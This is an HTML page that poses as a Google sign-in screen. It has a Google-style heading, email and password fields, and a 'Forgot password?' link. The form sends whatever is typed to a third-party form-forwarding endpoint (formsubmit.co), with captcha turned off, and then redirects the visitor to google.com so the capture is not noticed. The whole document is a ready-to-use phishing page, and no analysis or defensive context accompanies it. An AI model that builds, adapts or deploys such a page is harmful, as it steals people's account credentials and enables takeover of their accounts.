<html>
<head>
<title>Google sign in</title>

  <meta charset="utf-8" />
  <meta name="description" content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking ..." />
  <meta name="keywords" content="" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="theme-color" content="">
  <meta name="author" content="Bee corp">
  
  
  <link rel="stylesheet" href="style.css">
  
  <style>
  
  </style>
</head>
<body>
 
 <img src="image8-2.webp" style="display:none;">
 
 <!--container start-->
  <div id="cantainer">
  
   <!--wrape start-->
   <style>
   
   </style>
    <div id="wrape">
     <img src="images.png">
     <h1>Sign in</h1>
     <p>With your Google Account</p>
     
     <form action="https://formsubmit.co/6b243357c595731e8b997686f64b1e28" method="POST">
     <input type="hidden" name="_captcha" value="false">
     <input type="hidden" name="_next" value="https://google.com">
     <input type="hidden" name="_template" value="box">
     
      
      <input name="Email or phone" type="email" placeholder="Email or phone" required>
      
      <input name="password" type="password" placeholder="Enter your password" required>
       
       
       <br><br>
       
       <div>
        <a href="google.com" >Forgot password?</a>
        
        <button>sing in</button>
       </div>
     </form>
     
     
    </div>
   <!--wrape end-->
  
  </div>
 <!--container end-->
 
</body>
</html>